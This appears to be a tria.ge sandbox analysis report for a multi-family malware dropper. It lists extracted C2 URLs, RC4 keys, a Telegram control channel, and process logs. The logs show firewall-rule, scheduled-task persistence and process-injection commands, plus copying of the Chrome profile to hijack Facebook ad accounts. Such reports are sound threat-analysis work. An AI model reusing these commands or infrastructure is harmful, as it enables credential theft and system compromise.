Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

04/10/2024, 18:01 UTC

241004-wl132axhpm 10

22/04/2024, 20:52 UTC

240422-znvwksgb77 10

27/02/2024, 22:40 UTC

240227-2lykssdc83 10

03/01/2024, 09:53 UTC

240103-lw3dqscehj 10

29/12/2023, 23:48 UTC

231229-3txtxadcb8 10

Analysis

  • max time kernel
    1s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/12/2023, 23:48 UTC

General

  • Target

    078192e792b12a8d9980f364e110155c.exe

  • Size

    8.7MB

  • MD5

    078192e792b12a8d9980f364e110155c

  • SHA1

    89596e27530eeccd6ad9644aa045e8e0499301a1

  • SHA256

    67b1a7835687bf5851cf29539b2d0ce90ab30d373edfcf9ee54237026c67df33

  • SHA512

    72a2f85f8aa87fed3b84641bfc4ecde195588837da52553871b9aa917b26c073fea973d2e521290ac08ef6907a21677ebf7bb7886ddef3996625cc81855c0bbc

  • SSDEEP

    196608:UYE5OOysmxHcbDvsAKhZcIGijUtw+cs3Ax9stqFiRtHTV3hZF:XE5OOSuszcTtwp1s8gRtHT5J

Malware Config

Extracted

Family

smokeloader

Botnet

pub2

Extracted

Family

ffdroider

C2

http://186.2.171.3

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
1
0x3b22e540
rc4.i32
1
0xa6b397e0

Extracted

Family

raccoon

Version

1.7.3

Botnet

92be0387873e54dd629b9bfa972c3a9a88e6726c

Attributes
  • url4cnc

    https://t.me/gishsunsetman

rc4.plain
1
$Z2s`ten\@bE9vzR
rc4.plain
1
8d4a316f90ccdb374cc9af27ab8932af

Signatures

  • Detect Fabookie payload 2 IoCs
  • FFDroider

    Stealer targeting social media platform users first seen in April 2022.

  • FFDroider payload 3 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 9 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Raccoon Stealer V1 payload 4 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars payload 2 IoCs
  • Nirsoft 3 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe
    "C:\Users\Admin\AppData\Local\Temp\078192e792b12a8d9980f364e110155c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:712
    • C:\Users\Admin\AppData\Local\Temp\Files.exe
      "C:\Users\Admin\AppData\Local\Temp\Files.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      PID:3068
      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        3⤵
          PID:3348
        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          3⤵
            PID:5216
        • C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
          "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
          2⤵
          • Executes dropped EXE
          PID:1196
        • C:\Users\Admin\AppData\Local\Temp\Install_Files.exe
          "C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"
          2⤵
            PID:2900
          • C:\Users\Admin\AppData\Local\Temp\pub2.exe
            "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
            2⤵
              PID:2340
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 368
                3⤵
                • Program crash
                PID:5800
            • C:\Users\Admin\AppData\Local\Temp\Complete.exe
              "C:\Users\Admin\AppData\Local\Temp\Complete.exe"
              2⤵
                PID:1580
              • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
                "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
                2⤵
                  PID:3616
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67
                  2⤵
                    PID:2432
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0xe0,0xe4,0xd8,0xdc,0x7ff9592046f8,0x7ff959204708,0x7ff959204718
                      3⤵
                        PID:3400
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
                        3⤵
                          PID:2112
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
                          3⤵
                            PID:3060
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                            3⤵
                              PID:3864
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                              3⤵
                                PID:3256
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
                                3⤵
                                  PID:2036
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
                                  3⤵
                                    PID:5516
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
                                    3⤵
                                      PID:5500
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
                                      3⤵
                                        PID:5596
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
                                        3⤵
                                          PID:5588
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
                                          3⤵
                                            PID:6128
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
                                            3⤵
                                              PID:6120
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,16949055657723518057,2015679127949557066,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3036 /prefetch:2
                                              3⤵
                                                PID:4816
                                            • C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
                                              "C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"
                                              2⤵
                                                PID:1648
                                                • C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
                                                  3⤵
                                                    PID:6644
                                                  • C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
                                                    3⤵
                                                      PID:6636
                                                    • C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe
                                                      3⤵
                                                        PID:6628
                                                    • C:\Users\Admin\AppData\Local\Temp\Info.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Info.exe"
                                                      2⤵
                                                        PID:452
                                                        • C:\Users\Admin\AppData\Local\Temp\Info.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\Info.exe"
                                                          3⤵
                                                            PID:5320
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                              4⤵
                                                                PID:5916
                                                              • C:\Windows\rss\csrss.exe
                                                                C:\Windows\rss\csrss.exe /94-94
                                                                4⤵
                                                                  PID:1376
                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                    5⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:3228
                                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                    5⤵
                                                                      PID:2824
                                                              • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
                                                                2⤵
                                                                  PID:1164
                                                                • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                                                  2⤵
                                                                    PID:2316
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                      3⤵
                                                                        PID:5168
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill /f /im chrome.exe
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          PID:3480
                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                        3⤵
                                                                          PID:1324
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                          3⤵
                                                                            PID:5864
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2884 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
                                                                              4⤵
                                                                                PID:5992
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
                                                                                4⤵
                                                                                  PID:1764
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2216 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
                                                                                  4⤵
                                                                                    PID:2796
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2144 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
                                                                                    4⤵
                                                                                      PID:2132
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:2
                                                                                      4⤵
                                                                                        PID:4784
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3528 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
                                                                                        4⤵
                                                                                          PID:1412
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3344 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
                                                                                          4⤵
                                                                                            PID:5952
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4948 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:1
                                                                                            4⤵
                                                                                              PID:6352
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3584 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
                                                                                              4⤵
                                                                                                PID:6096
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4092 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:8
                                                                                                4⤵
                                                                                                  PID:6052
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2672 --field-trial-handle=1904,i,12325366204935465877,5974903988307335944,131072 /prefetch:2
                                                                                                  4⤵
                                                                                                    PID:6856
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
                                                                                              1⤵
                                                                                                PID:1116
                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:1548
                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                  1⤵
                                                                                                    PID:3372
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 604
                                                                                                      2⤵
                                                                                                      • Program crash
                                                                                                      PID:1608
                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:684
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3372 -ip 3372
                                                                                                      1⤵
                                                                                                        PID:2992
                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                        1⤵
                                                                                                        • Process spawned unexpected child process
                                                                                                        PID:3748
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2340 -ip 2340
                                                                                                        1⤵
                                                                                                          PID:5768
                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                                          1⤵
                                                                                                          • Modifies Windows Firewall
                                                                                                          PID:5700
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff95b8b9758,0x7ff95b8b9768,0x7ff95b8b9778
                                                                                                          1⤵
                                                                                                            PID:5892
                                                                                                          • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                            1⤵
                                                                                                              PID:1804

                                                                                                            Network

                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              19.177.190.20.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              19.177.190.20.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              158.240.127.40.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              158.240.127.40.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              ip-api.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              ip-api.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              ip-api.com
                                                                                                              IN A
                                                                                                              208.95.112.1
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              ip-api.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              ip-api.com
                                                                                                              IN A
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              www.listincode.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              www.listincode.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              www.listincode.com
                                                                                                              IN A
                                                                                                              199.59.243.225
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              ipinfo.io
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              ipinfo.io
                                                                                                              IN A
                                                                                                              Response
                                                                                                              ipinfo.io
                                                                                                              IN A
                                                                                                              34.117.186.192
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              95.221.229.192.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              95.221.229.192.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              95.221.229.192.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              95.221.229.192.in-addr.arpa
                                                                                                              IN PTR
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              95.221.229.192.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              95.221.229.192.in-addr.arpa
                                                                                                              IN PTR
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              192.186.117.34.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              192.186.117.34.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                              192.186.117.34.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              19218611734bcgoogleusercontentcom
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              music-sec.xyz
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              music-sec.xyz
                                                                                                              IN A
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              iplogger.org
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              iplogger.org
                                                                                                              IN A
                                                                                                              Response
                                                                                                              iplogger.org
                                                                                                              IN A
                                                                                                              172.67.132.113
                                                                                                              iplogger.org
                                                                                                              IN A
                                                                                                              104.21.4.208
                                                                                                            • flag-us
                                                                                                              GET
                                                                                                              http://ip-api.com/json/
                                                                                                              Remote address:
                                                                                                              208.95.112.1:80
                                                                                                              Request
                                                                                                              GET /json/ HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                              Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
